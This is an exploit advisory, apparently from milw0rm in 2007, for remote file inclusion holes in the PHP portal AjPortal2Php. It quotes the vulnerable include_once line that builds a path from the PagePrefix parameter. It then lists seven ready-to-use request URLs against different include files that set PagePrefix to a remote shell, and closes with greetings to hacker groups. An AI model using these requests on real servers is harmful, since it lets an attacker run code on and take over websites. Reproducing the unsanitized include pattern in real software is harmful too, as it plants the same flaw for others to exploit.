1 # [ AjPortal2Php]
2
3 # Class: File Include Vulnerability
4
5 # Remote: Yes
6
7 # Site: http://www.ajlopez.com/downloads/AjPortal2Php.zip
8
9 # Author: Alkomandoz Hacker
10
11 # Contact: alkomandoz−hacker@hotmail.com
12
13 #############################################################
14
15 file ;
16
17 begin.inc.php
18 connection.inc.php
19 events.inc.php
20 footer.inc.php
21 header.inc.php
22 menuleft.inc.php
23 pages.inc.php
24
25
26 ======================================================
27 Vuln Code
28
29 include_once($PagePrefix.’includes/configuration.inc.php’);
30
31
32
33 =======================================================
34 Exploit :
35
36 [AjPortal2Php _path]/includes/begin.inc.php?PagePrefix=Shell
37 [AjPortal2Php _path]/includes/connection.inc.php?PagePrefix=Shell
38 [AjPortal2Php _path]/includes/events.inc.php?PagePrefix=Shell
39 [AjPortal2Php _path]/includes/footer.inc.php?PagePrefix=Shell
40 [AjPortal2Php _path]/includes/header.inc.php?PagePrefix=Shell
41 [AjPortal2Php _path]/includes/menuleft.inc.php?PagePrefix=Shell
42 [AjPortal2Php _path]/includes/pages.inc.php?PagePrefix=Shell
43
44
45
46 −−−− Thanx: [HaCk.eGy] [Mahmood_ali] [Dr.aSiEr H@Ck] [ AsB−MaY GrOuPs ] [CiTy Of GhOsTs]
47
48 −−−− GreeTz: All www.Asb−May.Net & WwW.MoHaNdKo.CoM
49
50 # milw0rm.com [2007−04−17]
Page 1/1
AjPortal2Php PagePrefix Remote File Inclusion Vulnerabilities
Alkomandoz Hacker
04/17/2007